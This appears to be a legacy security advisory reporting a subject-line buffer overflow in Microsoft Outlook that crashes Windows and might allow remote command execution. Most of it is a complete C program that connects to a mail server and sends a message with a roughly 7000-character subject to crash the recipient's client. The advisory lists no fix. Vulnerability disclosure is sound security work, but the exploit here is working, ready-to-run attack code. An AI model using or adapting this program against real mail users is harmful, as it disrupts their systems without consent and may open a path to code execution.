COMMAND

    Outlook

SYSTEMS AFFECTED

    Systems using Outlook (Win, dunno about others)

PROBLEM

    Rockme  Security  Research   Laboratory  found  following.    When
    Microsoft Outlook read the subject of  an e-mail he place it in  a
    board with a size of about  5000 characters, and do not check  the
    size of  the received  subject!   This program  just made  windows
    crashing.   It  seems  also  possible  to  execute remote command.
    Some people said  that when you  overwrite the buffer  of Outlook,
    Windows  overwrite  the  swap  space  an  then  make  your windows
    unusable, but there's nothing like that yet.  Exploit follows:

    /*
     rockme@altern.org

     */
     /* Greeting to Zyrtex, Next, Clement and everyone i know :p            */
     /*             Have fun ! and remember, no bad use :)                  */
     /* let's start */

    #include <stdio.h>
    #include <strings.h>
    #include <errno.h>
    #include <signal.h>
    #include <sys/syscall.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>

    struct in_addr
    resolv(char *name)
    {
      static struct in_addr in;
      unsigned long l;
      struct hostent *ent;

      if((l = inet_addr (name)) != INADDR_NONE)
        {
          in.s_addr = l;
          return in;
        }
      if(!(ent = gethostbyname (name)))
        {
          in.s_addr = INADDR_NONE;
          return in;
        }
      return *(struct in_addr *) ent->h_addr;
    }

       char buf[70000];
       char server[5000];
       char mailfrom[5000];
       char rcptto[5000];

    main (int argc, char *argv[])
    {
      struct sockaddr_in addr;
      int i, s;
      char c;
      int port=25;


     if(argc < 3){
     printf("\n Usage : %s mail_server sender recipient \n\n", argv[0]);
     printf(" Warning this program do not spoof your IP adress !\n\n");
     exit(0);
     }

     if(strlen(argv[1]) > 4990){
     printf("Sorry mailserver is too big .\n");
     exit(0);
     }

     if(strlen(argv[2]) > 4990){
     printf("Sorry sender is too big .\n");
     exit(0);
     }

     if(strlen(argv[3]) > 4990){
     printf("Sorry recipient is too big .\n");
     exit(0);
     }

     /*  Mwarf, my program is protected from buffer overflow attacks :) */

     printf("\nRockme Security Research Laboratory !\n\n\n");
     printf("Microsoft Outlook Denial of Service !\n");
     printf("Veuillez patienter environ 20 secondes suivant la vitesse du serveur ...\n");

     sprintf(server, "HELO %s\n", argv[1]);
     sprintf(mailfrom, "MAIL FROM: %s\n", argv[2]);
     sprintf(rcptto, "RCPT TO: %s\n", argv[3]);

      s = socket(AF_INET, SOCK_STREAM, 0);
      addr.sin_family = AF_INET;
      addr.sin_addr = resolv(argv[1]);
      addr.sin_port = htons(port);
      connect(s, (struct sockaddr *) &addr, sizeof (addr));

    write(s, server, strlen(server));
    sleep(1);

    write(s, mailfrom, strlen(mailfrom));
    sleep(1);

    write(s, rcptto, strlen(rcptto));
    sleep(1);

    write(s, "data\n", 5);
    sleep(1);

    write(s, "Subject : ", 10);
    sleep(1);

    for(i = 1; i < 7000; i++){
    write(s, "X", 1);
    }
    sleep(3);

    write(s, "\n", 1);
    sleep(1);

    write(s, "bonjour\n", 8);
    sleep(1);

    write(s, ".\n", 2);
    sleep(1);

    write(s, "quit\n", 5);
    sleep(1);

    read(s, buf, 69000); /* read (s, &c, 1); */
    printf("%s", buf);

    printf("\n");

    }

SOLUTION

    Nothing yet.